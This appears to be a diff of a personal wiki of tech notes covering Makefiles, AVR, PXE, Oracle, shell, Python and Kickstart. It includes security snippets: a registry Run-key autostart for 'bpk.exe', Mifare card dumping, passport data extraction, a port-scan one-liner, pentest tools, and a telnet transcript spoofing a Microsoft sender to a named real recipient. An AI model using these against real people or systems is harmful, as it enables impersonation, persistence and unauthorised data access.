+       keycode 215 = XF86Save
+       keycode 219 = XF86WWW
+       keycode 220 = XF86LaunchE
+       keycode 223 = XF86Sleep
+       keycode 228 = XF86Pictures
+       keycode 231 = XF86LaunchA
+       keycode 236 = XF86Mail
+       keycode 237 = XF86AudioMedia
+       keycode 246 = XF86iTouch
+       keycode 247 = XF86Launch3
+       keycode 249 = XF86ToDoList
+       keycode 251 = XF86Calculater
+}}}

! Hook Autostart
+{{{
+HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run bpk = < %windir%\System32\bpk.exe>
+}}}

[[GettingStarted]]
+[[Security]]
+[[Hardware]]
+[[Programming]]
+[[Hacking]]
+! Misc
+[[TODO]]
+[[Fun]]
+[[RSS of this Blog|/wiki/knowledge_base.xml]]
+

! For Testing
+!! Async test all executables in t/ according to TAP
+{{{
+usage:;cat Makefile
+test:
+        @export PATH="$(CURDIR)/bin:$(PATH)"; \
+                tests="`find t -type f -executable`"; \
+                i=1; \
+                pids="";\
+                n=`echo "$$tests" | wc -l`; \
+                echo $$i..$$n; \
+                for exe in $$tests; do \
+                        { \
+                                ./$$exe; \
+                                ret=$$?; \
+                                case $$ret in 0) result=ok;; *) result='not ok';; esac; \
+                                echo $$result $$i - $$exe; \
+                                exit $$ret;\
+                        } & \
+                        pids="$${pids} $$!" \
+                        i=$$(( i+1 )); \
+                done; \
+                ret=0;\
+                for pid in $$pids; do \
+                        wait $$pid || ret=23;\
+                done; \
+                exit $$ret;
+}}}
+!! Sync test all executables in t/
+{{{
+usage:;cat Makefile
+test:
+        @export PATH="$(CURDIR)/bin:$(PATH)"; \
+                tests="`find t -type f -executable`"; \
+                i=1; \
+                n=`echo "$$tests" | wc -l`; \
+                echo $$i..$$n; \
+                ret=0;\
+                for exe in $$tests; do \
+                                ./$$exe; \
+                                thisret=$$?; \
+                                case $$thisret in 0) result=ok;; *) result='not ok';ret=255;; esac; \
+                                echo $$result $$i - $$exe; \
+                        i=$$(( i+1 )); \
+                done; \
+                exit $$ret;
+}}}

!wget + exiftool
+{{{
+wget -r -l1 --no-parent -A.jpg http://example.com
+exiftool -r -h -a -u -gl * >output.html
+}}}
+! Videos
+!! Methods
+{{{
+exiftool $file
+tovid id $file
+mplayer -vo null -ao null -identify -frames 0 $file
+
+}}}

* add those tiny feet thingies
+* try some code directly via serial (send when switch is closed)
+
+!Direct compile with AVR-GCC
+!! Installation
+{{{
+yaourt -S avr-gcc avr-libc dfu-programmer
+}}}
+!! Source Code
+# port_test.c
+{{{
+#include <avr/io.h>
+
+int main(void) {
+  DDRD = 0b01100000; /* LED Ports are in output mode */
+  PORTD = 0b10000000; /* Enable pull-up on PD7 */
+  while(1) {
+    if(PIND & (1<<PD7)) {
+        PORTD |= 1<<PD6; /* Red off */
+        PORTD &= ~(1<<PD5); /* Blue on */
+    } else {
+        PORTD |= 1<<PD5; /* Blue off */
+        PORTD &= ~(1<<PD6); /* Red on */
+    }
+  }
+  return 0;
+}
+}}}
+!! Makefile
+{{{
+CPU=at90usb162 # Target is a Minimus
+#CPU=atmega32u2 # Target is a Minimus 32
+CC=avr-gcc
+CFLAGS=-g -Os -Wall -mcall-prologues -mmcu=$(CPU)
+OBJ2HEX=avr-objcopy
+DFU=dfu-programmer
+TARGET=port_test
+
+upload : hex
+	$(DFU) $(CPU) erase
+	$(DFU) $(CPU) flash $(TARGET).hex
+	$(DFU) $(CPU) start
+
+hex : $(TARGET).hex
+
+%.obj : %.o
+	$(CC) $(CFLAGS) $< -o $@
+
+%.hex : %.obj
+	$(OBJ2HEX) -R .eeprom -O ihex $< $@
+
+clean :
+	rm -f *.hex *.obj *.o
+}}}
+!! Deploy
+{{{
+make hex
+make upload
+}}}
+
+!LUFA
+http://www.fourwalledcubicle.com/LUFA.php
+edit the "makefile"s before trying demos
+{{{
+MCU = at90usb162
+BOARD = MINIMUS
+CLOCK = 16000000
+}}}
+when it says "no joystick bla" , try to pull it out of the demos header and source.
+
+use other ports in order to make it working?

!Links
+https://help.ubuntu.com/community/PXEInstallServer
+https://wiki.koeln.ccc.de/index.php/Ubuntu_PXE_Install
+http://hotfortech.wikispaces.com/how+to+PXE+the+Ubuntu+9.10+liveCD+(fog-extension)
+https://help.ubuntu.com/community/PXEInstallMultiDistro
+https://wiki.archlinux.org/index.php/Archiso-as-pxe-server
+https://wiki.archlinux.org/index.php/Install_Arch_from_network_via_PXE
+!Preconditions
+{{{
+pacman -S tftp-hpa dhcp
+ifconfig eth0 10.42.0.1
+}}}
+! Dhcp Daemon
+/etc/dhcpd.conf
+{{{
+option domain-name-servers 8.8.8.8 , 8.8.4.4;
+default-lease-time 86400;
+max-lease-time 604800;
+authoritative;
+subnet 10.42.0.0 netmask 255.255.255.0 {
+ range 10.42.0.10 10.42.0.149;
+ filename "pxelinux.0";        # the PXELinux boot agent
+ option subnet-mask 255.255.255.0;
+ option broadcast-address 192.168.0.255;
+ option routers 192.168.0.1;
+}
+}}}
+! TFTP-hpa Daemon
+{{{
+#
+# Parameters to be passed to TFTPD
+#
+RUN_DAEMON="yes"
+TFTPD_ARGS="-l -s /var/tftpboot" 
+}}}
+! or just try DNSMASQ
+{{{
+dhcp-boot=pxelinux.0,roo,10.42.0.1
+}}}
+! in /var/tftpboot
+TODO

Type the text for 'No.de'

! Find Oracle Home
+should be, in most cases, right below {{{bin/sqlplus}}}
+! Find Oracle SID
+{{{
+lsnrctl services
+}}}
+{{{
+cat $ORACLE_HOME/network/admin/listener.ora 
+}}}
+! Database encryption
+!! Create new Wallet
+in {{{sqlnet.ora}}}
+{{{
+ENCRYPTION_WALLET_LOCATION=
+  (SOURCE=(METHOD=FILE)(METHOD_DATA=
+    (DIRECTORY=/u01/app/oracle/admin/DB10G/encryption_wallet/)))
+}}}
+!! Set password
+Wallets must be reopened after an instance restart and can be closed to prevent access to encrypted columns.
+{{{
+ALTER SYSTEM SET ENCRYPTION KEY AUTHENTICATED BY "myPassword";
+ALTER SYSTEM SET WALLET OPEN IDENTIFIED BY "myPassword";
+}}}
+!! Encrypt rows
+{{{
+CREATE TABLE tde_test (
+  id    NUMBER(10),
+  data  VARCHAR2(50) ENCRYPT
+)
+TABLESPACE tde_test;
+}}}
+!! Show Encrypted Rows
+{{{
+SET LINESIZE 100
+COLUMN owner FORMAT A15
+COLUMN tble_name FORMAT A15
+COLUMN column_name FORMAT A15
+
+SELECT * FROM dba_encrypted_columns;
+}}}

! Caveats
+{{{
+- use [ ^I] instead of \s in regex
+- do not use which, use type/command -v/hash
+- do not use arrays, use github.com/makefu/array instead
+}}}
+
+!Parameter Expansion
+http://pubs.opengroup.org/onlinepubs/009695399/utilities/xcu_chap02.html
+<html>
+<table border="1" cellpadding="3" align="center"> 
+<tr valign="top"> 
+<th align="center"> 
+<p class="tent"><i>&nbsp;</i></p> 
+</th> 
+<th align="center"> 
+<p class="tent"><i>parameter</i></p> 
+</th> 
+<th align="center"> 
+<p class="tent"><i>parameter</i></p> 
+</th> 
+<th align="center"> 
+<p class="tent"><i>parameter</i></p> 
+</th> 
+</tr> 
+ 
+<tr valign="top"> 
+<th align="center"> 
+<p class="tent"><b>&nbsp;</b></p> 
+</th> 
+<th align="center"> 
+<p class="tent"><b>Set and Not Null</b></p> 
+</th> 
+<th align="center"> 
+<p class="tent"><b>Set But Null</b></p> 
+</th> 
+<th align="center"> 
+<p class="tent"><b>Unset</b></p> 
+</th> 
+</tr> 
+ 
+<tr valign="top"> 
+<td align="left"> 
+<p class="tent"><b>${</b><i>parameter</i><b>:-</b><i>word</i><b>}</b></p> 
+</td> 
+<td align="left"> 
+<p class="tent">substitute <i>parameter</i></p> 
+</td> 
+<td align="left"> 
+<p class="tent">substitute <i>word</i></p> 
+</td> 
+<td align="left"> 
+<p class="tent">substitute <i>word</i></p> 
+</td> 
+</tr> 
+ 
+<tr valign="top"> 
+<td align="left"> 
+<p class="tent"><b>${</b><i>parameter</i><b>-</b><i>word</i><b>}</b></p> 
+</td> 
+<td align="left"> 
+<p class="tent">substitute <i>parameter</i></p> 
+</td> 
+<td align="left"> 
+<p class="tent">substitute null</p> 
+</td> 
+<td align="left"> 
+<p class="tent">substitute <i>word</i></p> 
+</td> 
+</tr> 
+ 
+<tr valign="top"> 
+<td align="left"> 
+<p class="tent"><b>${</b><i>parameter</i><b>:=</b><i>word</i><b>}</b></p> 
+</td> 
+<td align="left"> 
+<p class="tent">substitute <i>parameter</i></p> 
+</td> 
+<td align="left"> 
+<p class="tent">assign <i>word</i></p> 
+</td> 
+<td align="left"> 
+<p class="tent">assign <i>word</i></p> 
+</td> 
+</tr> 
+ 
+<tr valign="top"> 
+<td align="left"> 
+<p class="tent"><b>${</b><i>parameter</i><b>=</b><i>word</i><b>}</b></p> 
+</td> 
+<td align="left"> 
+<p class="tent">substitute <i>parameter</i></p> 
+</td> 
+<td align="left"> 
+<p class="tent">substitute null</p> 
+</td> 
+<td align="left"> 
+<p class="tent">assign <i>word</i></p> 
+</td> 
+</tr> 
+ 
+<tr valign="top"> 
+<td align="left"> 
+<p class="tent"><b>${</b><i>parameter</i><b>:?</b><i>word</i><b>}</b></p> 
+</td> 
+<td align="left"> 
+<p class="tent">substitute <i>parameter</i></p> 
+</td> 
+<td align="left"> 
+<p class="tent">error, exit</p> 
+</td> 
+<td align="left"> 
+<p class="tent">error, exit</p> 
+</td> 
+</tr> 
+ 
+<tr valign="top"> 
+<td align="left"> 
+<p class="tent"><b>${</b><i>parameter</i><b>?</b><i>word</i><b>}</b></p> 
+</td> 
+<td align="left"> 
+<p class="tent">substitute <i>parameter</i></p> 
+</td> 
+<td align="left"> 
+<p class="tent">substitute null</p> 
+</td> 
+<td align="left"> 
+<p class="tent">error, exit</p> 
+</td> 
+</tr> 
+ 
+<tr valign="top"> 
+<td align="left"> 
+<p class="tent"><b>${</b><i>parameter</i><b>:+</b><i>word</i><b>}</b></p> 
+</td> 
+<td align="left"> 
+<p class="tent">substitute <i>word</i></p> 
+</td> 
+<td align="left"> 
+<p class="tent">substitute null</p> 
+</td> 
+<td align="left"> 
+<p class="tent">substitute null</p> 
+</td> 
+</tr> 
+ 
+<tr valign="top"> 
+<td align="left"> 
+<p class="tent"><b>${</b><i>parameter</i><b>+</b><i>word</i><b>}</b></p> 
+</td> 
+<td align="left"> 
+<p class="tent">substitute <i>word</i></p> 
+</td> 
+<td align="left"> 
+<p class="tent">substitute <i>word</i></p> 
+</td> 
+<td align="left"> 
+<p class="tent">substitute null</p> 
+</td> 
+</tr> 
+</table> 
+<dl compact> 
+<dt>${<i>parameter</i>:-<i>word</i>}</dt> 
+ 
+<dd> 
+In this example, <a href="../utilities/ls.html"><i>ls</i></a> is executed only if <i>x</i> is null or unset. (The $( <a href=
+"../utilities/ls.html"><i>ls</i></a>) command substitution notation is explained in <a href="#tag_02_06_03">Command
+Substitution</a>.) 
+ 
+<blockquote> 
+<pre> 
+<tt>${x:-$(ls)}
+</tt> 
+</pre> 
+</blockquote> 
+</dd> 
+ 
+<dt>${<i>parameter</i>:=<i>word</i>}</dt> 
+ 
+<dd> 
+<pre> 
+<tt>unset X
+echo ${X:=abc}
+</tt><b>abc</b> 
+</pre> 
+</dd> 
+ 
+<dt>${<i>parameter</i>:?<i>word</i>}</dt> 
+ 
+<dd> 
+<pre> 
+<tt>unset posix
+echo ${posix:?}
+</tt><b>sh: posix: parameter null or not set</b> 
+</pre> 
+</dd> 
+ 
+<dt>${<i>parameter</i>:+<i>word</i>}</dt> 
+ 
+<dd> 
+<pre> 
+<tt>set a b c
+echo ${3:+posix}
+</tt><b>posix</b> 
+</pre> 
+</dd> 
+ 
+<dt>${#<i>parameter</i>}</dt> 
+ 
+<dd> 
+<pre> 
+<tt>HOME=/usr/posix
+echo ${#HOME}
+</tt><b>10</b> 
+</pre> 
+</dd> 
+ 
+<dt>${<i>parameter</i>%<i>word</i>}</dt> 
+ 
+<dd> 
+<pre> 
+<tt>x=file.c
+echo ${x%.c}.o
+</tt><b>file.o</b> 
+</pre> 
+</dd> 
+ 
+<dt>${<i>parameter</i>%%<i>word</i>}</dt> 
+ 
+<dd> 
+<pre> 
+<tt>x=posix/src/std
+echo ${x%%/*}
+</tt><b>posix</b> 
+</pre> 
+</dd> 
+ 
+<dt>${<i>parameter</i>#<i>word</i>}</dt> 
+ 
+<dd> 
+<pre> 
+<tt>x=$HOME/src/cmd
+echo ${x#$HOME}
+</tt><b>/src/cmd</b> 
+</pre> 
+</dd> 
+ 
+<dt>${<i>parameter</i>##<i>word</i>}</dt> 
+ 
+<dd> 
+<pre> 
+<tt>x=/one/two/three
+echo ${x##*/}
+</tt><b>three</b> 
+</pre> 
+</dd> 
+</dl> 
+ 
+<p>The double-quoting of patterns is different depending on where the double-quotes are placed:</p> 
+ 
+<dl compact> 
+<dt><tt>"${x#*}"</tt></dt> 
+ 
+<dd>The asterisk is a pattern character.</dd> 
+ 
+<dt><tt>${x#"*"}</tt></dt> 
+ 
+<dd>The literal asterisk is quoted and not special.</dd> 
+</dl> 
+
+</html>
+
+!Arithmetic Expressions
+
+<html>
+<p><tt>A simple example using arithmetic expansion:</tt></p> 
+ 
+<blockquote> 
+<pre> 
+<tt># repeat a command 100 times
+x=100
+while [ $x -gt 0 ]
+do
+   </tt> <i>command</i> <tt>   x=$(($x-1))
+done
+</tt> 
+</pre> 
+</blockquote> 
+
+</html>
+! Pipelines
+
+Both expressions write "bar"
+{{{
+false && echo foo || echo bar
+true || echo foo && echo bar
+}}}
+{{{
+while
+    # a couple of <newline>s
+
+
+    # a list
+    date && who || ls; cat file
+    # a couple of <newline>s
+
+
+    # another list
+    wc file > output & true
+
+
+do
+    # 2 lists
+    ls
+    cat file
+done
+}}}

! tcpdump
+{{{
+# full packet sniff, avoid truncate
+tcpdump -i eth- -w out.pcap -s 0
+}}}

!OpenPS2Loader
+
+Download: http://bitbucket.org/ifcaro/open-ps2-loader
+
+! Installing Games
+get it from the bundle
+{{{ iso2opl ISO INSTALLPATH GAMENAME [DVD|CD] }}}
+
+! fix ul.cfg
+!! deleting a game
+{{{ vim -b}}}
+
+64x before the entry you want to delete
+
+!! fixing DVD|CD
+DVD is 0x14 and right behind the filename entry
+CD is 0x12
+switch them with hexedit

Mostly Code snippets:
+[[CPP]]
+[[Python2]]
+[[bash]]
+[[node.js]]
+[[POSIX Shell]]
+[[ruby]]
+[[powershell]]

! Python for the user
+in ~/.profile 
+{{{
+export PYTHONPATH=~/.local/lib/python2.7/site-packages
+export PATH=$PATH:~/.local/lbin
+}}}
+then do
+{{{
+pip install --user <stuff>
+}}}
+! Interactive Shell
+!! Activate Tab Completion
+{{{
+import rlcompleter,readline;readline.parse_and_bind("tab: complete")
+}}}
+! Single file Python
+!! py2zip
+from http://people.canonical.com/~roman.yepishev/us/src/
+{{{
+#!/bin/bash
+
+ORIG_PWD=$PWD
+
+set -ex
+
+TARGET="$1"
+TARGET_BASENAME=`basename "$TARGET"`
+shift
+
+MAIN=$1
+shift
+
+FILES="$*"
+TEMPDIR=`mktemp -d /tmp/XXXXXXXX`
+
+cp "$MAIN" "$TEMPDIR/__main__.py"
+cp --parents -r $FILES "$TEMPDIR/"
+
+cd "$TEMPDIR"
+zip -q -r build.zip *
+cd "$ORIG_PWD"
+echo "#!/usr/bin/python" > "$TEMPDIR/build.header"
+cat "$TEMPDIR/build.header" "$TEMPDIR/build.zip" > "$TEMPDIR/$TARGET_BASENAME"
+chmod +x "$TEMPDIR/$TARGET_BASENAME"
+mv "$TEMPDIR/$TARGET_BASENAME" $TARGET
+}}}
+
+!Conditionals
+{{{
+>>> x = 5
+>>> 1 < x < 10
+True
+>>> 10 < x < 20
+False
+>>> x < 10 < x*10 < 100
+True
+>>> 10 > x <= 9
+True
+>>> 5 == x > 4
+True
+}}}
+!Random
+{{{
+from random import random
+seed()           # which seed to use
+randint(a,b)     # int between a and b
+randrange(start,stop,step) # like choice(range(start,stop,step))
+hoice(seq)       # random choice from sequence
+shuffle(x)       # shuffles sequence
+sample(seq,num)  # choose num samples
+uniform()        # float between a and b
+}}}
+!Decorators
+{{{
+
+def print_args(function):
+    def wrapper(*args, **kwargs):
+        print 'Arguments:', args, kwargs
+        return function(*args, **kwargs)
+    return wrapper
+
+@print_args
+def write(text):
+    print text
+
+>>> write('foo')
+Arguments: ('foo',){}
+foo
+}}}
+!Advanced Regexes
+{{{
+re.compile("^\[font(?:=(?P<size>[-+][0-9]{1,2}))?\](.*?)[/font]",
+    re.DEBUG)
+}}}

!General
+{{{
+id(obj) -- returns the address of the object
+help(obj) -- returns help for the object
+dir(obj)  -- returns what the obj provides
+
+#### counter loop
+    for i in range(5):
+        print i
+
+#### Just run code when called directly
+if __name__ == '__main__':
+   main()
+
+# swap vars
+a,b,c = c,a,b
+}}}
+
+!Dictionaries
+{{{
+# var in dict
+print d.get('key','not found')
+
+# dictionary has key
+dict().has_key(k)
+
+# intersection
+print "Intersects:", [k for k in some_dict if k in another_dict]
+}}}
+!Loops
+{{{
+for k,v in dict.iteritems():
+    print k,v
+for i,v in enumerate(dict):
+   print "item no.",i,"value: ",v
+}}}

!quick Random String
+{{{
+hashlib.md5(str(random.random()).encode()).hexdigest()[:11]
+or
+base64.b64encode(str(random.random()))[:-1]
+}}}
+! Port Scanner
+{{{
+python2 -c "from socket import socket;from sys import exit;exit(socket().connect_ex(('$HOST',$PORT)))"
+}}}

!pdb
+{{{
+import pdb
+pdb.set_trace()
+}}}
+!ipython debugging
+{{{
+ipython --pylab
+plot(list)
+%pdb on
+
+import pdb
+pdb.run('class.function()')
+
+import profile
+profile.run('class.function()')
+}}}
+!ipython enhanced pdb
+{{{
+
+from IPython.Debugger import Tracer; debug_here = Tracer()
+debug_here()
+
+#in shell
+run -d -b 3 proggy
+# s for debug
+# b for new breakpoint
+}}}
+

! Log to Syslog
+{{{
+import logging, logging.handlers
+logger = logging.getLogger("a_name")
+hdlr = logging.handlers.SysLogHandler(
+facility=logging.handlers.SysLogHandler.LOG_DAEMON)
+formatter = logging.Formatter(
+'%(filename)s: %(levelname)s: %(message)s')
+hdlr.setFormatter(formatter)
+logger.addHandler(hdlr)
+}}}

!SMTP
+http://docs.python.org/library/smtplib.html
+
+{{{
+import sys, smtplib,string
+
+fromaddr = raw_input("From: ")
+toaddrs  = string.splitfields(raw_input("To: "), ',')
+msg = ("From: %s\r\nTo: %s\r\n\r\n"
+       % (fromaddr, ", ".join(toaddrs)))
+print "Enter message, end with ^D:"
+msg = ''
+while 1:
+    line = sys.stdin.readline()
+    if not line:
+        break
+    msg = msg + line
+# The actual mail send
+server = smtplib.SMTP('localhost')
+#server.login(user,pass)
+server.sendmail(fromaddr, toaddrs, msg)
+server.quit()
+}}}
+
+!POP3
+http://docs.python.org/library/poplib.html
+{{{
+import getpass, poplib
+
+M = poplib.POP3('localhost')
+M.user(getpass.getuser())
+M.pass_(getpass.getpass())
+numMessages = len(M.list()[1])
+for i in range(numMessages):
+    for j in M.retr(i+1)[1]:
+        print j
+}}}
+!imap4
+http://docs.python.org/library/imaplib.html
+{{{
+import getpass, imaplib
+
+M = imaplib.IMAP4()
+M.login(getpass.getuser(), getpass.getpass())
+M.select()
+typ, data = M.search(None, 'ALL')
+for num in data[0].split():
+    typ, data = M.fetch(num, '(RFC822)')
+    print 'Message %s\n%s\n' % (num, data[0][1])
+M.close()
+M.logout()
+}}}

{{{
+modules     : lowercase+short
+classes     : CapWords
+Exceptions  : CapsWords+Error
+Functions   : self for instance, cls for classvar
+method+     : leading _ for non-public
+instance    : lowercase seperated by underscore when necessary
+Global      : like class
+constants   : CAPS_LOCK
+}}}

{{{
+import signal,os
+
+# handler function
+def handler(signum,frame):
+    print 'something happened'
+# register signal
+signal.signal(signal.SIGALRM,handler)
+
+# send sigalrm in 5 seconds
+signal.alarm(5)
+}}}

{{{
+int (string )           -- integer to string
+str.encode('rot13')     -- encode string to rot13
+str.split()             -- splits at SPACE, takes optional token
+shlex.split(str)        -- tokenizes in shellstyle( "bla bla" stays together)
+chr(NUM)                => Character
+ord('a')                => Integer
+#Centering Command Line
+print '|', 'hej'.ljust(20,'+'), '|', 'hej'.rjust(20,'-'), '|', 'hej'.center(20,'*), '|'
+#Format Strings (old Style)
+print "string %s float %.3f" % (string, float)
+}}}
+
+!String Templates
+{{{
+s = Template("$who is $what")
+s.substitute(who="bob", what="teh sux") -- crashes when not enough params
+s.safe_substitute()     -- keeps not substituted identifier intact
+}}}
+

!Lightweight Threads Based
+{{{
+#!/usr/bin/python
+#                           -- basics --
+# all internal python operations are thread safe and use the same internal lock
+
+#                           -- timer --
+
+# do something after a specified time
+import threading.Timer
+def hello():
+    print "hello, world"
+
+t = threading.Timer(30.0, hello)
+t.start() # after 30 seconds, "hello, world" will be printed
+
+#                   -- Thread for function --
+
+from threading import  Thread
+def f1(a):
+    print "ass"
+    return a
+
+b = 1
+t_f1 = Thread(target = f1, args = (b,))
+t_f1.start()
+
+# ( e.g. thread in endless loop )
+
+class loopthread(Thread):
+    def __init__(self,bla):
+       Thread.__init__(self)
+    def threadLoop(self):
+        while 1:
+        # you might also want aquire and lock here
+            if self.loopon==0:
+                break
+        #...do stuff...
+    def stopThread(self):
+        self.loopon=1
+        self.thread1.join() # wait for finish
+}}}
+!Multiprocessing
+http://docs.python.org/library/multiprocessing.html
+{{{
+p = Pool(5)
+def f(x):
+    return x*x
+
+p.map(f, [1,2,3])
+}}}
+!Process creation
+http://docs.python.org/library/subprocess.html
+{{{
+"""
+subprocess.
+    Popen(["/bin/ls", "-l") # has many bonus parameters, asynchronous call
+    call(["/bin/ls", "-l"]) # waits for the program to stop
+
+Popen.
+    poll()                  # checks if process terminated already
+    wait()                  # waits for process to finish
+    communicate(input=None) # interact with process via stdin, read from stdout,stderr, waits for process to finish
+                            # returns tuple (outdata,indata) needs Popen to have stdin=PIPE,etc..
+    send_signal(SIGX)
+    terminate()             # SIGTERM
+    kill()                  # SIGKILL
+    stdin                   # pipes when Popen is called with stdin=PIPE, etc..
+    stdout/stderr
+    pid                     #process id
+"""
+#                       -- examples --
+
+# pipeline
+p1 = Popen(["dmesg"], stdout=PIPE)
+p2 = Popen(["grep", "hda"], stdin=p1.stdout, stdout=PIPE)
+output = p2.communicate()[0]
+# backquote ( a=`ls -l` )
+output = Popen(["ls", "-l"], stdout=PIPE).communicate()[0]
+# os.system()
+retcode = call("mycmd" + " myarg", shell=True)
+if retcode < 0:
+    #signal under UNIX
+else:
+    #returncode
+    pass
+
+# environmental variables
+Popen(["/bin/mycmd", "myarg"], env={"PATH": "/usr/bin"})
+}}}

{{{
+import curses
+from curses.wrapper import wrapper
+
+def main(stdscr):
+    curses.noecho() #normally do not echo keystrokes
+    curses.cbreak() #not buffer input
+    stdscr.keypad(1) # return special values 
+
+    curses.nocbreak(); stdscr.keypad(0); curses.echo();curses.endwin() #return to normal
+
+if __name__ == '__main__':
+   wrapper(main)
+}}}
+!Texbox
+{{{
+import curses
+from curses.wrapper import wrapper
+from curses.textpad import Textbox
+
+def main(stdscr):
+    curses.noecho() #normally do not echo keystrokes
+    curses.cbreak() #not buffer input
+    stdscr.keypad(1) # return special values
+    
+    curses.init_pair(1,curses.COLOR_GREEN,curses.COLOR_BLUE)
+    curses.init_pair(2,curses.COLOR_YELLOW,curses.COLOR_BLACK)
+    stdscr.bkgd(curses.color_pair(2))
+    stdscr.box()
+    stdscr.refresh()
+
+    win1 = curses.newwin(20,40,10,5)
+    win1.bkgd(curses.color_pair(1))
+    win1.refresh()
+
+    win2 = curses.newwin(20,40,10,50)
+    win2.bkgd(curses.color_pair(2))
+    win2.refresh()
+
+    textbox = Textbox(win1)
+    text = textbox.edit()
+    win2.addstr(0,0,text)
+    win2.refresh()
+
+
+    #  Displays a section of the pad in the middle of the screen
+    c = stdscr.getch()
+    curses.nocbreak(); stdscr.keypad(0); curses.echo();curses.endwin() #return to normal
+
+if __name__ == '__main__':
+   wrapper(main) #supplies stdscr
+}}}

[[Python Strings]]
+[[Python Basics]]
+[[Python Advanced]]
+[[Python Debugger]]
+[[Python Mail]]
+[[Python Naming Conventions]]
+[[Python Threading and Process Creation]]
+[[Python Signals]]
+[[Python Code Snippets]]
+[[Python Logging]]
+!GUI
+[[Python curses]]
+[[wxPython]]
+[[Tkinter]]

! Kickstart for installation
+In CD Rom Boot Menu:
+{{{
+linux ks=http://192.168.0.10:8001/ks.cfg
+}}}
+On 192.168.0.10
+{{{
+cat >ks.cfg <<EOF
+install
+cdrom
+key --skip
+lang en_US.UTF-8
+keyboard us
+xconfig --startxonboot
+network --device eth0 --bootproto static --ip 172.29.174.238 --netmask 255.255.255.240 --gateway 172.29.174.225 --hostname BBMS-101
+rootpw --iscrypted $6$KbJWSNaf$tDaVXxtUw1nEH5mtutGd6hnpzZQbKmFw9hq2E0gNHp9m5IAm9h8KxZVB3bxdnelOJ0I9.CbGTw4qSIoc/rsix
+firewall --enabled --port=22:tcp
+reboot
+authconfig --enableshadow --enablemd5
+selinux --enforcing
+timezone --utc Europe/Berlin
+bootloader --location=mbr --driveorder=hda --append="rhgb quiet"
+
+clearpart --linux --all --initlabel
+part /boot --fstype ext3 --size=1024 --ondisk=hda --asprimary
+part pv.4 --size=100 --grow --ondisk=hda
+#volgroup raid10_vg1 --pesize=32768 pv.15
+volgroup raid1_vg0 --pesize=32768 pv.4
+logvol /var --fstype ext3 --name=var --vgname=raid1_vg0 --size=5240
+logvol / --fstype ext3 --name=root --vgname=raid1_vg0 --size=5000
+logvol /tmp --fstype ext3 --name=tmp --vgname=raid1_vg0 --size=2048
+logvol /var/log/audit --fstype ext3 --name=var_log_audit --vgname=raid1_vg0 --size=1120
+logvol /var/log --fstype ext3 --name=var_log --vgname=raid1_vg0 --size=2000
+
+%packages
+@admin-tools
+@base
+@core
+@dialup
+@editors
+@gnome-desktop
+@games
+@graphical-internet
+@graphics
+@java
+@legacy-software-support
+@office
+@printing
+@sound-and-video
+@text-internet
+@base-x
+kexec-tools
+iscsi-initiator-utils
+fipscheck
+device-mapper-multipath
+sgpio
+emacs
+libsane-hpaio
+xorg-x11-utils
+xorg-x11-server-Xnest
+EOF
+python -m http.server 8001
+}}}
+! Install Only Security Patches
+{{{
+yum install yum-security
+yum list-security
+yum --security check-update
+yum update --security
+}}}
+

Sun Apr 18 2010 :
+install aur rt2870
+
+# in /etc/modprobe/wireless.conf
+{{{
+blacklist rt2800usb, rt2x00usb , rt2x00lib
+}}}
+then REBOOT
+

!pcsc SmartCard Reader
+{{{
+bb -S pcsc-perl pcsclite pcsc-tools
+/etc/rc.d/pcscd start
+pcsc_scan
+}}}
+! install
+yaourt -S libfreefare mfoc
+!! Dump Mifare Classic
+{{{
+mfoc -O here2.dump 
+}}}
+!!get Serial Number of the card
+{{{
+echo FFCA000000 | scriptor 
+}}}
+Commands : http://www.wrankl.de/SCTables/SCTables.html
+Tutorial DESFire
+http://ridrix.wordpress.com/2009/09/19/mifare-desfire-communication-example/
+!ctapi 
+{{{
+bb -S ctapi-cyberjack hal 
+/etc/rc.d/hal restart
+dbus-daemon --system
+cyberjack
+}}}
+!rfidiot
+http://rfidiot.org
+!!prereq
+download and install pyscard
+download rfidiot
+!!patching
+{{{
+# in RFIDIOtconfig.py
+> readernum = 0
+
+# in RFIDIOt
+> if readernum > len(self.pcsc)
+
+>self.readername = str(self.pcsc[readernum])
+> #self.pcsc_connection.disconnect()
+}}}
+!! Passport
+extract Certificate and picture
+{{{
+python2 mrpkey.py "lower line of the passport"
+}}}
+

! Write basic SMTP
+{{{
+$ telnet hoemail1.alcatel.com  25                                                                                                                                  1 ↵
+Trying 192.160.6.148...
+Connected to hoemail1.alcatel.com.
+Escape character is '^]'.
+220 hoemail1.alcatel.com ESMTP Mon, 10 Jun 2013 06:59:32 -0500 (CDT)
+HELO me.lolwutland.com
+250 hoemail1.alcatel.com Hello [192.40.56.122], pleased to meet you
+MAIL FROM:<bill@microsoft.com>
+250 2.1.0 <bill@microsoft.com>... Sender ok
+RCPT TO:<christopher.gregorian@alcatel-lucent.com>
+250 2.1.5 <christopher.gregorian@alcatel-lucent.com>... Recipient ok
+DATA
+354 Enter mail, end with "." on a line by itself
+From:<bill@microsoft.com>
+To:<christopher.gregorian@alcatel-lucent.com>
+Subject: Job Offer
+
+Get a great job at Microsoft!
+.
+250 2.0.0 r5ABxW2G028697 Message accepted for delivery
+}}}

mwmap -- map network from pcap -- http://sourceforge.net/projects/nwmap/
+mz -- mausezahn fast packet forgery -- http://www.perihel.at/sec/mz/
+
+! Penetration Testing
+!! Web Penetration Testing
+!!! SQL Injection
+http://sqlmap.sourceforge.net/
+http://sqlninja.sourceforge.net/
+!!! Proxies
+Zed Attack Proxy - http://code.google.com/p/zaproxy/
+
+!!! Education
+http://www.darknet.org.uk/2011/04/bodgeit-store-vulnerable-web-application-for-penetration-testing/
+

[[Hardening]]
+[[SecTools]]
+[[Exploits]]
+[[Evasion]]
+[[Security Demo]]
+[[Contracts]]
+[[MS Windows]]
+! Cloud Services
+[[Dotcloud]]
+[[No.de]]
+! Evasion
+[[DNS TUNNEL]]
+! Defense
+[[honeyd]]
+! USB stuff
+[[u3-tool]]
+! Basics
+[[SMTP]]

! Aufbau
+Laptop1: 192.168.100.23
+> Backtrack : 192.168.100.5
+Laptop2: 192.168.100.42
+> Windows XP Service Pack 0 : 192.168.100.2
+
+{{{ alias nmap='nmap -T insane ' }}}
+
+! 1. Footprinting
+{{{
+Soviele informationen ausfindig machen uber das Ziel wie moeglich,
+soziale webseiten, suchmaschinen, DNS eintraege, etc.
+Moegliche Ziele ausfindig machen
+
+! 2. Scanning and Enumeration
+{{{
+nmap -sP 192.168.100.*   // Pingscan - unauffaelliger Scan um zu 
+nmap -A 192.168.100.2    // winxp sp0
